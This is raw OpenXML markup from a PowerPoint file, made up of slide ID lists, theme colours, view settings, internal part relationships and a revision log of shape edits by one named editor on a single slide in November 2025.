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mf" ContentType="image/x-wmf"/>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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/custom-properties" Target="docProps/custom.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773" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId106"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId107"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="353" r:id="rId5"/>
    <p:sldId id="392" r:id="rId6"/>
    <p:sldId id="421" r:id="rId7"/>
    <p:sldId id="394" r:id="rId8"/>
    <p:sldId id="529" r:id="rId9"/>
    <p:sldId id="480" r:id="rId10"/>
    <p:sldId id="491" r:id="rId11"/>
    <p:sldId id="492" r:id="rId12"/>
    <p:sldId id="493" r:id="rId13"/>
    <p:sldId id="410" r:id="rId14"/>
    <p:sldId id="448" r:id="rId15"/>
    <p:sldId id="450" r:id="rId16"/>
    <p:sldId id="449" r:id="rId17"/>
    <p:sldId id="464" r:id="rId18"/>
    <p:sldId id="465" r:id="rId19"/>
    <p:sldId id="530" r:id="rId20"/>
    <p:sldId id="531" r:id="rId21"/>
    <p:sldId id="532" r:id="rId22"/>
    <p:sldId id="533" r:id="rId23"/>
    <p:sldId id="534" r:id="rId24"/>
    <p:sldId id="535" r:id="rId25"/>
    <p:sldId id="511" r:id="rId26"/>
    <p:sldId id="422" r:id="rId27"/>
    <p:sldId id="474" r:id="rId28"/>
    <p:sldId id="413" r:id="rId29"/>
    <p:sldId id="400" r:id="rId30"/>
    <p:sldId id="504" r:id="rId31"/>
    <p:sldId id="506" r:id="rId32"/>
    <p:sldId id="507" r:id="rId33"/>
    <p:sldId id="508" r:id="rId34"/>
    <p:sldId id="509" r:id="rId35"/>
    <p:sldId id="402" r:id="rId36"/>
    <p:sldId id="475" r:id="rId37"/>
    <p:sldId id="528" r:id="rId38"/>
    <p:sldId id="536" r:id="rId39"/>
    <p:sldId id="537" r:id="rId40"/>
    <p:sldId id="490" r:id="rId41"/>
    <p:sldId id="518" r:id="rId42"/>
    <p:sldId id="519" r:id="rId43"/>
    <p:sldId id="481" r:id="rId44"/>
    <p:sldId id="484" r:id="rId45"/>
    <p:sldId id="451" r:id="rId46"/>
    <p:sldId id="520" r:id="rId47"/>
    <p:sldId id="452" r:id="rId48"/>
    <p:sldId id="521" r:id="rId49"/>
    <p:sldId id="453" r:id="rId50"/>
    <p:sldId id="522" r:id="rId51"/>
    <p:sldId id="455" r:id="rId52"/>
    <p:sldId id="456" r:id="rId53"/>
    <p:sldId id="457" r:id="rId54"/>
    <p:sldId id="486" r:id="rId55"/>
    <p:sldId id="458" r:id="rId56"/>
    <p:sldId id="459" r:id="rId57"/>
    <p:sldId id="460" r:id="rId58"/>
    <p:sldId id="487" r:id="rId59"/>
    <p:sldId id="542" r:id="rId60"/>
    <p:sldId id="543" r:id="rId61"/>
    <p:sldId id="544" r:id="rId62"/>
    <p:sldId id="545" r:id="rId63"/>
    <p:sldId id="546" r:id="rId64"/>
    <p:sldId id="547" r:id="rId65"/>
    <p:sldId id="548" r:id="rId66"/>
    <p:sldId id="549" r:id="rId67"/>
    <p:sldId id="550" r:id="rId68"/>
    <p:sldId id="563" r:id="rId69"/>
    <p:sldId id="559" r:id="rId70"/>
    <p:sldId id="560" r:id="rId71"/>
    <p:sldId id="494" r:id="rId72"/>
    <p:sldId id="510" r:id="rId73"/>
    <p:sldId id="495" r:id="rId74"/>
    <p:sldId id="501" r:id="rId75"/>
    <p:sldId id="502" r:id="rId76"/>
    <p:sldId id="503" r:id="rId77"/>
    <p:sldId id="551" r:id="rId78"/>
    <p:sldId id="538" r:id="rId79"/>
    <p:sldId id="539" r:id="rId80"/>
    <p:sldId id="540" r:id="rId81"/>
    <p:sldId id="541" r:id="rId82"/>
    <p:sldId id="523" r:id="rId83"/>
    <p:sldId id="524" r:id="rId84"/>
    <p:sldId id="525" r:id="rId85"/>
    <p:sldId id="526" r:id="rId86"/>
    <p:sldId id="552" r:id="rId87"/>
    <p:sldId id="553" r:id="rId88"/>
    <p:sldId id="554" r:id="rId89"/>
    <p:sldId id="558" r:id="rId90"/>
    <p:sldId id="555" r:id="rId91"/>
    <p:sldId id="556" r:id="rId92"/>
    <p:sldId id="557" r:id="rId93"/>
    <p:sldId id="512" r:id="rId94"/>
    <p:sldId id="498" r:id="rId95"/>
    <p:sldId id="499" r:id="rId96"/>
    <p:sldId id="500" r:id="rId97"/>
    <p:sldId id="513" r:id="rId98"/>
    <p:sldId id="514" r:id="rId99"/>
    <p:sldId id="515" r:id="rId100"/>
    <p:sldId id="517" r:id="rId101"/>
    <p:sldId id="516" r:id="rId102"/>
    <p:sldId id="527" r:id="rId103"/>
    <p:sldId id="561" r:id="rId104"/>
    <p:sldId id="562" r:id="rId105"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>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137"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43654"/>
    <a:srgbClr val="72829E"/>
    <a:srgbClr val="5B7BB5"/>
    <a:srgbClr val="486AC8"/>
    <a:srgbClr val="339933"/>
    <a:srgbClr val="FF572F"/>
    <a:srgbClr val="FF6600"/>
    <a:srgbClr val="FEF8B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9D049BA-DB32-453D-B6B1-B7729B759B20}" v="63" dt="2025-11-04T13:15:31.32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735" autoAdjust="0"/>
    <p:restoredTop sz="95033" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="81" d="100"/>
          <a:sy n="81" d="100"/>
        </p:scale>
        <p:origin x="126" y="462"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2137"/>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microsoft.com/office/2016/11/relationships/changesInfo" Target="changesInfos/changesInfo1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/handoutMaster" Target="handoutMasters/handoutMaster1.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microsoft.com/office/2015/10/relationships/revisionInfo" Target="revisionInfo.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presProps" Target="presProps.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notesMaster" Target="notesMasters/notesMaster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viewProps" Target="viewProps.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theme" Target="theme/theme1.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ommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}"/>
    <pc:docChg chg="undo custSel addSld modSld">
      <pc:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:15:40.979" v="256" actId="1036"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:01:35.094" v="12" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="377"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:01:35.094" v="12" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="377"/>
            <ac:spMk id="36869" creationId="{78BA95E1-DD9C-0DD8-974E-67CA12DD470F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod">
        <pc:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:15:40.979" v="256" actId="1036"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2289180836" sldId="442"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:07:07.133" v="184" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="2" creationId="{255A3CFB-6EE8-6FCA-5427-E37B34B3280B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:07:07.133" v="184" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="3" creationId="{8BD93CCE-41C1-A919-141B-FF737799D053}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:07:07.133" v="184" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="4" creationId="{5A4CCB3E-0DA9-DF22-058C-7AB888298C81}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:07:07.133" v="184" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="5" creationId="{769468C3-E31C-5EE6-1023-16A62043486B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:06:53.504" v="183" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="6" creationId="{46BAD9DD-24C4-FCC8-53C4-637A4BAA01F7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:12:09.640" v="248" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="7" creationId="{60660E56-13AA-41B4-D14B-CBB1C35938A1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:06:53.504" v="183" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="8" creationId="{20128F4C-D0EC-30FD-5A62-4D06B7C4109D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:06:53.504" v="183" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="9" creationId="{5FE97DE8-AA16-9846-D075-390318353BDB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:11:30.650" v="238" actId="208"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="10" creationId="{BC2B9B62-F418-57A0-8EE3-A022B11B68C3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:11:44.114" v="242" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="11" creationId="{F29C2D40-591D-E3AE-1B0A-2C7BA38CBA82}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:11:37.856" v="241" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="12" creationId="{E664D223-5253-B6DA-9D0D-F7F4BC6079EC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:15:40.979" v="256" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="13" creationId="{A3D82279-F0D5-8B97-FC73-581E41B55991}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:15:40.979" v="256" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="14" creationId="{CB866D4E-B7B0-F7F3-3A9A-E75A23D157A5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:15:40.979" v="256" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="15" creationId="{53D5A52D-CDF1-5C67-7F94-CFE9C017A0D2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:12:02.176" v="246" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="16" creationId="{C64A699E-C1A8-4DD9-9D36-A19E21CECD33}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:12:02.176" v="246" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="17" creationId="{2050A22F-E0A7-4141-8B92-F0C4CDD650C1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:12:02.176" v="246" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="18" creationId="{6C2902E5-B6CB-0721-8683-80155569721D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:01:57.130" v="49" actId="1038"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36869" creationId="{08DF9FAF-DAC9-565A-50FA-E6AD46E9434B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:15:31.327" v="252" actId="1038"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36880" creationId="{C184651E-DB96-8C28-4C90-7CCFBA888C0C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:07:25.273" v="187" actId="1037"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36881" creationId="{AFA4793A-804D-EF47-F8AD-AD327114B152}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:07:19.297" v="186" actId="1037"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36882" creationId="{E28C114C-8D85-545D-0A5D-26BFE8A6B90A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:03:17.150" v="130" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36883" creationId="{E8B620E2-4489-FBEF-2CCB-2622FBF5838E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:04:48.418" v="141" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36884" creationId="{9B0C91EE-844D-23E0-70B1-878B944AF5A7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:04:48.418" v="141" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36885" creationId="{9C8F7671-049F-DD0E-5204-73AC0FCAEBF9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:04:48.418" v="141" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36886" creationId="{BC678FBA-091A-2A95-710B-8B61DC5AE64E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36887" creationId="{648E8A8A-5A2A-6F16-C66D-004162814794}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36889" creationId="{3243DE91-E26B-FEEE-B2E0-4C8B2573634D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36890" creationId="{7BFA8A8E-3EAA-5851-2444-0A9A678BADF2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36891" creationId="{BFBFB290-EE0D-CB03-289C-7E98183921E9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:04:11.637" v="140" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36893" creationId="{334374A0-5419-F5AC-0234-CFD8687888E8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:02:49.440" v="113" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36894" creationId="{CECA3BE2-D430-E2B2-2006-F5B3D45BB538}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:04:48.418" v="141" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36895" creationId="{8D0EF7D9-ACC7-1864-E9F9-C6F206B4529D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:04:48.418" v="141" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36896" creationId="{42B359ED-D28A-F09D-FD45-37A780FE284F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36897" creationId="{9461E659-7D45-18B2-9978-B03CA3F90DC7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36898" creationId="{661AD201-B569-D0DA-EBB2-D235CD98BA9D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:03:17.150" v="130" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36899" creationId="{8E77294C-E2CB-2C89-FDB9-067C74E8C697}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:04:48.418" v="141" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36900" creationId="{9F5B6731-6242-6447-DD9A-FB41EEE7BD56}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36901" creationId="{FBECE880-073E-398F-64C1-F11E88EDFE47}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36902" creationId="{9B504950-A66F-DD57-2BED-0F089E57012F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36903" creationId="{4182A27B-4C01-AE7D-8910-CF5022CC7BC7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:05:52.703" v="152" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2289180836" sldId="442"/>
            <ac:spMk id="36904" creationId="{6B7DADFD-39EC-0279-2B43-7D1C8A842B0E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Tommaso Caiazzi" userId="4467b6bb-f22e-43e1-9cfc-2b9dfdaab12b" providerId="ADAL" clId="{7D8E847D-69B8-40EC-B31B-66968959F711}" dt="2025-11-04T13:06:44.923" v="182" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
